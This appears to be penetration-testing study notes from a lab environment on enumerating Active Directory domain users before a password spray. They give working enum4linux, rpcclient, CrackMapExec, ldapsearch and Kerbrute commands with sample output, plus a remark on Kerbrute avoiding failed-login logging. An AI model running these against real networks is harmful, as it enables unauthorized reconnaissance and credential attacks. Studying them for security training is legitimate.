Performing a successful password spray attack requires us to have a list of valid domain users. We can enumerate domain users to get a list of valid usernames in multiple ways, both from an authenticated and unauthenticated position.
Tools that can help us with user hunting:
- enum4linux
- rpcclient
- CrackMapExec
- Kerbrute
enum4linux #
enum4linux -U <ip_address>
The output will look like this
<SNIP>
| Users on <ip_address> |
index: 0x1447 RID: 0x1447 acb: 0x00020015 Account: $725000-9jb50uejje9f Name: Jessica Ramsey Desc: (null)
index: 0x4df RID: 0x4df acb: 0x00000210 Account: abinateps Name: Annamarie Carpenter Desc: (null)
index: 0x5b9 RID: 0x5b9 acb: 0x00000210 Account: abings Name: Kevin Alley Desc: (null)
index: 0x970 RID: 0x970 acb: 0x00000210 Account: ablemody Name: Gladys Mills Desc: (null)
index: 0xbef RID: 0xbef acb: 0x00000210 Account: ablemplaid Name: Patrick Deblois Desc: (null)
index: 0xcd0 RID: 0xcd0 acb: 0x00000210 Account: ablempling Name: Nancy Lane Desc: (null)
index: 0x6fe RID: 0x6fe acb: 0x00000210 Account: abless Name: Antonio Stucky Desc: (null)
index: 0xd21 RID: 0xd21 acb: 0x00000210 Account: abloome Name: Michael Johnson Desc: (null)
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]
user:[avazquez] rid:[0x458]
<SNIP>
We can further clean it up to get just the username with some bash magic
enum4linux -U <ip_address> | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
It will look like this
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
ccruz
njohnson
mholliday
rpcclient #
We can connect anonimously, and run the command “enumdomusers”
rpcclient -U "" -N <ip_address>
rpcclient$> enumdomusers
The output looks like this
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[aslater] rid:[0x464]
user:[kprentiss] rid:[0x465]
user:[gdavis] rid:[0x466]
CrackMapExec #
crackmapexec smb <ip_address> --users
The output looks like this
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\pfalcon badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.919005
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\fanthony badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.919005
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\wdillard badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.934613
If we already have valid credentials for a user, we can perform an authenticated query
sudo crackmapexec smb <ip_address> -u <username> -p <password> --users
ldapsearch #
ldapsearch -h <ip_address> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"
The output looks like this (just for one user)
# Charles Mcgurk, Operations, Logistics-LAX, Employees, Corp, INLANEFREIGHT.LOC
AL
dn: CN=Charles Mcgurk,OU=Operations,OU=Logistics-LAX,OU=Employees,OU=Corp,DC=I
NLANEFREIGHT,DC=LOCAL
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Charles Mcgurk
sn: Mcgurk
l: Cleveland
postalCode: 44114
givenName: Charles
distinguishedName: CN=Charles Mcgurk,OU=Operations,OU=Logistics-LAX,OU=Employe
es,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
instanceType: 4
whenCreated: 20211027173732.0Z
whenChanged: 20220218035608.0Z
displayName: Charles Mcgurk
uSNCreated: 18935
memberOf: CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
memberOf: CN=Shared Calendar Read,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,
DC=LOCAL
memberOf: CN=Printer Access,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOC
AL
memberOf: CN=File Share H Drive,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC
=LOCAL
memberOf: CN=File Share G Drive,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC
=LOCAL
memberOf: CN=Sales,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
uSNChanged: 2989391
department: Operations
streetAddress: 2356 Sunny Glen Lane
name: Charles Mcgurk
objectGUID:: RHryzGv3dkigEqibH7n9yw==
userAccountControl: 66048
badPwdCount: 2
codePage: 0
countryCode: 0
badPasswordTime: 132902178380127532
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132798298525782567
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAqpgO5bfzSOdKf8uq2gUAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: ladiandal
sAMAccountType: 805306368
userPrincipalName: ladiandal@inlanefreight.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
dSCorePropagationData: 20220324155258.0Z
dSCorePropagationData: 20220324154931.0Z
dSCorePropagationData: 20220322030317.0Z
dSCorePropagationData: 20220322030314.0Z
dSCorePropagationData: 16030219181425.0Z
We can clean up the output to get just the useful information
ldapsearch -h <ip_address> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName:
sAMAccountName: sgage
sAMAccountName: asanchez
sAMAccountName: dbranch
sAMAccountName: ccruz
sAMAccountName: njohnson
sAMAccountName: mholliday
sAMAccountName: mshoemaker
sAMAccountName: aslater
sAMAccountName: kprentiss
sAMAccountName: gdavis
Or even nicer
ldapsearch -h <ip_address> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
sgage
asanchez
dbranch
ccruz
njohnson
mholliday
mshoemaker
aslater
kprentiss
gdavis
Kerbrute #
This tool is very good because it doesn’t trigger a failed login event, because it tries to ask for usernames without bla bla bla
kerbrute userenum -d <domain> --dc <ip_address> <wordlist.txt>
2025/04/17 05:13:50 > [+] VALID USERNAME: jjones@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: sbrown@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: jwilson@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: tjohnson@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: bdavis@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: njohnson@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: asanchez@inlanefreight.local
2025/04/17 05:13:51 > [+] VALID USERNAME: dlewis@inlanefreight.local